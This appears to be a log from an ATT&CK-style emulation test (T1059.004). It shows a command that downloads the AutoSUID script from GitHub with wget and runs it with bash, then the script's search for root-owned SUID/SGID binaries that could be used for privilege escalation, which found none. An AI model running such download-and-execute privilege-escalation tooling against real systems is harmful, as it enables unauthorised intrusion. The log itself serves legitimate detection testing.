[+] Tactic ID   : T1059.004-1
[+] Technique   : Command and Scripting Interpreter - Unix Shell
[+] Command     :
wget -q https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh -O /tmp/AutoSUID.sh 
bash /tmp/AutoSUID.sh
[+] Success
----- OUTPUT START -----

[00;33m╔═══════════════════════════════════════════════════════════════════════════╗[00m
[00;33m║									    ║[00m
[00;33m║[00m[01;32m				  AutoSUID				    [00m[00;33m║[00m
[00;33m║									    ║[00m
[00;33m╚═══════════════════════════════════════════════════════════════════════════╝[00m

[00;33m[ ! ] https://www.linkedin.com/in/IvanGlinkin/ | @glinkinivan[00m

[00;33m[ ! ][00m Running the command to find SUID files
[01;36m[ * * ][00m[01;32m find / -xdev -user root \( -perm -4000 -o -perm -2000 -o -perm -6000 \) 2>/dev/null[00m
[01;32m[ + ][00m The command has successfuly performed. We have found [01;32m25[00m file(s)
[00;33m[ ! ][00m Let's compare the found SUID files with predefined base ([01;32m175[00m apps)
[01;31m[ - ][00m Unfortunately, there are no any SUID files, which lead to privilege escalation
----- OUTPUT END -----
